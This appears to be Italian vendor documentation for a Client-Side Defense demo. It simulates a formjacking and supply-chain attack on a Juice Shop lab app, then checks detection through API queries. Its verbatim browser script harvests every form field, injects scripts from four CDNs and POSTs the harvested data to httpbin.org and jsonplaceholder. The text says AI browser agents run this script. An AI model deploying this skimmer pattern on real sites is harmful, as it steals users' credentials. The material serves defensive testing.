Fase 2 — Attacco

La Fase 2 genera traffico di attacco simulato contro l’applicazione protetta e conferma che CSD lo abbia rilevato. La Fase 1 deve essere completata — tutti i controlli del Passaggio 7 devono risultare PASS — prima di procedere.

Passaggio 8: Simulazione dell’attacco

Nota

Questo passaggio richiede l’esecuzione di JavaScript lato browser — curl non può attivare il rilevamento CSD. Gli assistenti IA dotati di strumenti di automazione del browser (MCP Chrome DevTools, Playwright, Puppeteer) eseguono questi passaggi direttamente utilizzando la sequenza di Esecuzione automatizzata tramite IA riportata di seguito. Gli operatori privi di automazione del browser eseguono i passaggi manuali.

Dopo aver verificato l’infrastruttura (tutti i controlli del Passaggio 7 della Fase 1 risultano PASS), eseguire gli script di simulazione dell’attacco per generare rilevamenti CSD. Gli script sono definiti nella guida Rilevamento trigger e nella Libreria di script di attacco.

Esecuzione automatizzata tramite IA

Gli assistenti IA dotati di strumenti di automazione del browser eseguono la simulazione dell’attacco in modo programmatico:

1. Navigazione con initScript — navigare prima verso about:blank per garantire un contesto documento pulito (evita initScript obsoleti da navigazioni precedenti), poi navigate_page verso http://$F5XC_DOMAINNAME/#/login con un initScript che salva i riferimenti nativi a setInterval, clearInterval, fetch e console.log prima che zone.js li modifichi, esegue il polling dei campi del modulo di accesso, compila le credenziali tramite il setter nativo HTMLInputElement.prototype.value e avvia immediatamente il Combined Detection Script inline. Utilizzare l’initScript verbatim riportato di seguito.
2. Chiusura del banner di benvenuto — premere Escape tramite press_key per chiudere il banner di benvenuto. Nelle visite successive il banner potrebbe non apparire (cookie persistenti). Il dialogo di consenso ai cookie viene chiuso automaticamente dal tasto Escape.
3. Attesa del completamento — attendere 10 secondi affinché tutti i callback di caricamento/errore degli script CDN e le risoluzioni delle promise fetch vengano completati.
4. Raccolta delle prove — list_console_messages per verificare la presenza di [CSD Demo] Simulation complete e i risultati del caricamento CDN; list_network_requests filtrato per tipi script e fetch per verificare i codici di stato HTTP (200/201 per esito positivo, pending per richieste in attesa).

initScript della Fase 2 (verbatim — utilizzare esattamente come scritto):

// Save native references before zone.js patches them
var _si = window.setInterval.bind(window);
var _ci = window.clearInterval.bind(window);
var _fetch = window.fetch.bind(window);
var _log = window.console.log.bind(window.console);

// Poll for login form fields, fill credentials, run detection script
var _poll = _si(function() {
  var emailEl = document.querySelector('#email');
  var passEl  = document.querySelector('#password');
  if (emailEl && passEl) {
    _ci(_poll);
    // Fill credentials via native setter (bypasses zone.js)
    var nativeSet = Object.getOwnPropertyDescriptor(
      window.HTMLInputElement.prototype, 'value').set;
    nativeSet.call(emailEl, 'test@example.com');
    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
    nativeSet.call(passEl, 'P@ssword123');
    passEl.dispatchEvent(new Event('input', { bubbles: true }));

    // Run Combined Detection Script inline using native fetch for exfil
    (function() {
      _log('==================================================');
      _log('[CSD Demo] Combined Detection Script — Starting');
      _log('==================================================');

      _log('\n[Formjack] Phase 1: Form field harvesting');
      var inputs = document.querySelectorAll('input');
      var harvested = {};
      inputs.forEach(function(input) {
        var name = input.name || input.id || input.type;
        harvested[name] = input.value || '(empty)';
      });
      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);

      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
      var cdns = [
        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
      ];
      cdns.forEach(function(cdn) {
        var script = document.createElement('script');
        script.src = cdn.url;
        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
        document.head.appendChild(script);
        _log('[Supply Chain] Injected script tag: ' + cdn.name);
      });

      _log('\n[Exfil] Phase 3: Data exfiltration');
      var payload = JSON.stringify({
        type: 'combined_demo', credentials: harvested,
        page: window.location.href, timestamp: Date.now()
      });
      _fetch('https://www.httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
        .then(function() { _log('[Exfil] Data sent to www.httpbin.org'); });
      _fetch('https://jsonplaceholder.typicode.com/posts', {
        method: 'POST', mode: 'no-cors',
        headers: { 'Content-Type': 'application/json' }, body: payload
      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });

      _log('\n==================================================');
      _log('[CSD Demo] Simulation complete');
      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
      _log('==================================================');
    })();
  }
}, 300);

Attenzione

Incompatibilità con zone.js — Juice Shop utilizza zone.js di Angular, che sostituisce setTimeout, setInterval, fetch, XMLHttpRequest e altre API del browser. Questo causa il fallimento degli strumenti MCP evaluate_script, fill e click con l’errore Cannot read properties of undefined (reading 'call'). Utilizzare navigate_page con initScript al suo posto — initScript viene eseguito prima del caricamento di zone.js, consentendo di salvare i riferimenti alle API native e utilizzarli nei callback di polling. L’initScript deve compilare i campi del modulo tramite il setter nativo HTMLInputElement.prototype.value (non tramite fill) ed eseguire lo script di rilevamento inline (non tramite setTimeout, che zone.js potrebbe intercettare dopo il caricamento della pagina). Consultare Rilevamento trigger — Esecuzione automatizzata tramite IA per i dettagli.

Nota

Accumulo di initScript — ogni chiamata a navigate_page con un parametro initScript aggiunge lo script a un elenco persistente che viene eseguito ad ogni caricamento successivo del documento. Per evitare interferenze da script obsoleti, navigare verso about:blank tra un’esecuzione e l’altra oppure utilizzare new_page con isolatedContext per un contesto browser pulito.

Nota

Salvataggio del riferimento nativo a fetch nell’initScript — l’initScript salva window.fetch.bind(window) prima che zone.js lo modifichi. Questo garantisce che le chiamate fetch funzionino correttamente senza gli errori Cannot read properties of undefined di zone.js. Lo stesso initScript (con il riferimento nativo a fetch salvato) viene utilizzato sia per le esecuzioni di attacco della Fase 2 che della Fase 3 — la mitigazione CSD non intercetta le chiamate fetch(), quindi salvare il riferimento nativo non influisce sul comportamento della mitigazione.

Attenzione

404 transitorio dell’origine — alla prima navigazione verso l’applicazione Angular, polyfills.js o altri script dell’applicazione potrebbero restituire un HTTP 404 transitorio dal server di origine. Questo causa il fallimento del bootstrap di Angular, con conseguente pagina bianca priva di modulo di accesso. Il 404 è temporaneo — le richieste successive restituiscono 200 o 304. Ripristino: navigare verso about:blank, attendere 2 secondi, quindi ripetere la navigazione. Se il problema persiste su più tentativi, verificare lo stato dell’origine tramite il percorso del load balancer (curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js).

Esecuzione manuale

Gli operatori privi di strumenti di automazione del browser eseguono i passaggi manualmente:

1. Navigare alla pagina di accesso dell’applicazione protetta: http://xF5XC_DOMAINNAMEx/#/login
2. Inserire credenziali fittizie — digitare test@example.com nel campo Email e P@ssword123 nel campo Password (non inviare il modulo)
3. Aprire DevTools — premere F12 e passare alla scheda Console
4. Eseguire il Combined Detection Script — incollare lo script da Rilevamento trigger — Eseguire il Combined Simulation Script nella console e premere Invio
5. Verificare l’output della console — confermare che l’output a fasi [CSD Demo] mostri: raccolta dei campi, iniezione di script da 4 domini CDN ed esfiltrazione dei dati verso 2 endpoint

Cosa viene attivato

Segnale	Comportamento	Rilevamento
Raccolta dei campi del modulo	Legge i valori degli input email e password	Script che leggono campi sensibili del modulo — classificati ad alto rischio
Iniezione di script	Inietta 4 tag <script> da cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io	Fino a 4 nuovi domini di script di terze parti rilevati (la disponibilità CDN può variare)
Esfiltrazione dei dati	Invia i dati raccolti tramite fetch verso www.httpbin.org e jsonplaceholder.typicode.com	Chiamate di rete verso domini esterni

Nota

La disponibilità CDN può variare. Non tutti e 4 gli script CDN verranno caricati ad ogni esecuzione — i limiti delle risorse del browser, le condizioni di rete o la limitazione della CDN potrebbero causare il fallimento di alcuni con ERR_INSUFFICIENT_RESOURCES o timeout. La simulazione ha esito positivo se almeno uno script CDN viene caricato. CSD rileva il tentativo di iniezione indipendentemente dal fatto che lo script venga caricato correttamente — la creazione stessa del tag <script> è il segnale di rilevamento.

In casi gravi, ERR_INSUFFICIENT_RESOURCES può aggravarsi in un errore a livello di pagina — l’intera pagina diventa bianca, gli screenshot vanno in timeout e take_snapshot fallisce. Questo si verifica tipicamente dopo che più navigazioni con initScript di grandi dimensioni si accumulano nello stesso contesto browser. Ripristino: utilizzare new_page con isolatedContext per creare un contesto browser nuovo, quindi riprovare dalla sequenza about:blank → navigate_page con initScript. Questo è distinto dai fallimenti dei singoli script CDN, che non influiscono sull’esito della simulazione.

Consiglio

Dopo aver eseguito la simulazione dell’attacco, utilizzare questo ciclo di polling deterministico per attendere i rilevamenti:

1. Interrogare /detected_domains ogni 60 secondi
2. Se DET-3 risulta PASS (i domini di esfiltrazione appaiono in /detected_domains), procedere immediatamente al Passaggio 9
3. Se ancora vuoto dopo 10 interrogazioni (10 minuti), verificare lo stato CSD (Passaggio 5 della Fase 1) e la registrazione del dominio protetto (Passaggio 6 della Fase 1) — probabilmente uno di questi è configurato in modo errato
4. Se ancora vuoto dopo 30 interrogazioni (30 minuti), interrompere e segnalare all’operatore — non procedere alla Fase 3

Per simulazioni mirate aggiuntive (categorie di attacco individuali, test di stress per il rilevamento massimo), consultare la Libreria di script di attacco.

Prove

L’assistente IA deve riportare quanto segue. Per l’esecuzione automatizzata tramite IA, le prove vengono raccolte in modo programmatico tramite list_console_messages (la funzione di polling dell’initScript registra i risultati nella console). Per l’esecuzione manuale, l’operatore legge l’output della console del browser.

Controllo	Atteso	Stato
Pagina di accesso caricata	200 OK su http://$F5XC_DOMAINNAME/#/login	PASS / FAIL
Script della console eseguito	[CSD Demo] Simulation complete nell’output della console	PASS / FAIL
Campi raccolti	Conteggio > 0 nell’output della console	PASS
Script iniettati	1–4 domini CDN nell’output della console (alcuni potrebbero fallire con errori di risorse)	PASS se appare almeno un dominio CDN
Canali di esfiltrazione	2 tentativi di fetch POST nell’output della console	PASS

Consiglio

Se il certificato HTTPS LB è valido (CertificateValid), è possibile eseguire facoltativamente la simulazione anche verso https://$F5XC_DOMAINNAME/#/login. Questo non è necessario per la progressione della demo.

Passaggio 9: Verifica del rilevamento tramite API

Interrogare gli endpoint API CSD per confermare la comparsa dei rilevamenti. Utilizzare il ciclo di polling: interrogare /detected_domains ogni 60 secondi; procedere non appena DET-3 risulta PASS. Se DET-3 non risulta PASS dopo 10 minuti, verificare la configurazione CSD. Se DET-3 non risulta PASS dopo 30 minuti, interrompere e segnalare all’operatore. Questi endpoint sono documentati nel Riferimento API e utilizzano la stessa autenticazione e lo stesso namespace dei passaggi precedenti.

Nota

Ordine di elaborazione degli endpoint: /detected_domains viene popolato per primo ed è l’indicatore principale che la pipeline CSD è operativa. /scripts e /formFields vengono popolati secondo una pianificazione di elaborazione backend più lenta e potrebbero rimanere vuoti per 20–30 minuti anche dopo più esecuzioni della simulazione. Se /detected_domains mostra i domini di esfiltrazione (www.httpbin.org, jsonplaceholder.typicode.com), considerare la simulazione come rilevata con successo e procedere — il controllo DET-1 riportato di seguito riflette questo comportamento.

Script rilevati

Interrogare gli script rilevati nelle ultime 24 ore:

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s -X POST \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  -H "Content-Type: application/json" \
  -d "{\"startTime\": \"$START\", \"endTime\": \"$NOW\"}" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/scripts" \
  | jq '{total: (.scripts | length), scripts: [.scripts[]? | {script_name: .script_name, risk_level: .risk_level}]}'

Campo	Atteso	Stato
total	> 0 (script rilevati)	PASS se > 0; PENDING se 0 ma /detected_domains mostra domini di esfiltrazione
Nomi degli script	Include i domini CDN (cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io) in script_name	PASS se compaiono i domini CDN iniettati

Domini rilevati

curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/detected_domains" \
  | jq '{total_domains: .domain_summary.totalDomains, domains: [.domains_list[]? | {domain: .domain, category: .category}]}'

Campo	Atteso	Stato
total_domains	> 0	PASS se > 0
Elenco domini	Include i domini CDN e di esfiltrazione	PASS se compaiono i domini attesi

Campi del modulo

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/formFields?startTime=$START&endTime=$NOW" \
  | jq '{total: .total_size, fields: [.form_fields[]? | {name: .name, sensitivity: .analysis.value, scripts: (.associated_scripts | length), locations: .locations}]}'

Campo	Atteso	Stato
total	> 0	PASS se > 0; PENDING se 0 ma DET-3 risulta PASS
name	Include email, password	PASS se compaiono i campi sensibili
sensitivity	Sensitive per i campi email/password	PASS se classificato correttamente dal ML

Nota

L’elaborazione dei campi del modulo è più lenta del rilevamento dei domini. L’endpoint /formFields potrebbe restituire campi con metadati parziali alla prima interrogazione. La classificazione della sensibilità tramite ML (Sensitive vs Not Sensitive) viene popolata dopo il completamento dell’elaborazione backend — questo può richiedere 20–30 minuti dopo la prima esecuzione della simulazione. Se i campi compaiono ma mancano di classificazione, ripetere l’interrogazione in seguito. DET-3 (/detected_domains) è il criterio di superamento principale.

Riepilogo delle prove della Fase 2

Dopo tutte le interrogazioni di rilevamento, presentare lo stato finale del rilevamento:

ID test	Controllo	Stato
DET-1	Script rilevati (endpoint /scripts)	PASS se > 0; PENDING se vuoto ma DET-3 risulta PASS
DET-2	Domini CDN rilevati	PASS / FAIL
DET-3	Domini di esfiltrazione rilevati (/detected_domains)	Indicatore principale — PASS se compaiono www.httpbin.org o jsonplaceholder.typicode.com
DET-4	Campi del modulo rilevati (endpoint /formFields)	PASS se > 0; PENDING se vuoto ma DET-3 risulta PASS

Nota

Criteri minimi di superamento per procedere alla Fase 3: DET-3 deve risultare PASS (domini di esfiltrazione visibili in /detected_domains). DET-1 e DET-4 potrebbero mostrare PENDING al primo utilizzo o dopo una ricostruzione da zero — questo è normale. Se DET-3 mostra anch’esso FAIL dopo 30 minuti, verificare che CSD sia abilitato (Passaggio 5 della Fase 1), che il dominio protetto sia registrato (Passaggio 6 della Fase 1) e che il tag JS CSD venga iniettato (controllo della configurazione JS del Passaggio 7 della Fase 1).

---

Fase 2 completata. Procedere a Fase 3 — Mitiga per applicare le regole di mitigazione e verificare che i domini siano bloccati.